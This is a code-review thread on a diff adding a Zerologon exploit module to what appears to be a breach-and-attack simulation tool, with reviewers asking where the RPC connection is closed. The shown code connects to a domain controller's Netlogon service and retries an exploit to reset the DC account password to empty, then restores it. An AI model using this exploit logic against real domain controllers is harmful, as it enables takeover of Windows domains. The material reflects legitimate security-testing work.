monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,365 @@
+
+    def __init__(self, host: object):
+        super().__init__(host)
+        self.vulnerable_port = None
+        self.zerologon_finger = ZerologonFinger()
+        self.exploit_info['credentials'] = {}
+
+    def _exploit_host(self) -> Optional[bool]:
+        self.dc_ip, self.dc_name, self.dc_handle = self.zerologon_finger._get_dc_details(self.host)
+
+        if self.is_exploitable():
+            LOG.info("Target vulnerable, changing account password to empty string.")
+
+            # Connect to the DC's Netlogon service.
+            try:
+                rpc_con = self.connect_to_dc()
+            except Exception as e:
+                LOG.info(f"Exception occurred while connecting to DC: {str(e)}")
+                return
+
+            # Start exploiting attempts.
+            # Max attempts = 2000. Expected average number of attempts needed: 256.
+            LOG.debug("Attempting exploit.")
+            result = None
+            for _ in range(0, self.MAX_ATTEMPTS):
+                try:
+                    result = self.attempt_exploit(rpc_con)
+                except nrpc.DCERPCSessionError as e:
+                    # Failure should be due to a STATUS_ACCESS_DENIED error.
+                    # Otherwise, the attack is probably not working.
+                    if e.get_error_code() != self.ERROR_CODE_ACCESS_DENIED:
+                        LOG.info(f"Unexpected error code from DC: {e.get_error_code()}")
+                except BaseException as e:
+                    LOG.info(f"Unexpected error: {e}")
+
+                if result is not None:
+                    break
+
+            if result['ErrorCode'] == 0:
+                self.report_login_attempt(result=True, user=self.dc_name)
+                _exploited = True
+                LOG.info("Exploit complete!")
+            else:
+                self.report_login_attempt(result=False, user=self.dc_name)
+                _exploited = False
+                LOG.info(f"Non-zero return code: {result['ErrorCode']}. Something went wrong.")
+
+        else:
+            LOG.info("Exploit failed. Target is either patched or an unexpected error was encountered.")
+            _exploited = False
+
+        # Restore DC's original password.
+        if _exploited:
+            if self.restore_password():
+                LOG.info("System exploited and password restored successfully.")
+            else:
+                LOG.info("System exploited but couldn't restore password!")
+        else:
+            LOG.info("System was not exploited.")
+
+        return _exploited
+
+    def is_exploitable(self) -> bool:
+        return self.zerologon_finger.get_host_fingerprint(self.host)
+
+    def connect_to_dc(self) -> object:
+        binding = epm.hept_map(self.dc_ip, nrpc.MSRPC_UUID_NRPC,
+                               protocol='ncacn_ip_tcp')
+        rpc_con = transport.DCERPCTransportFactory(binding).get_dce_rpc()
+        rpc_con.connect()
```

Comment:
Where do we close this connection?

Reply:
Maybe you could do something similar as was done here: https://github.com/guardicore/monkey/blob/24c772d42537b1321cc00620d22a87ec81b9561a/monkey/infection_monkey/exploit/tools/impacket_helpers/scmr_exploit_api.py#L69
This way, exploit logic will not interfere with lower level packet sending and connection handling. Other methods could benefit from such API as well - a lot of methods have `rpc_con` param, which indicates that this value should be an object variable

Reply:
This might be a bit of an overkill, your choice.

Reply:
todo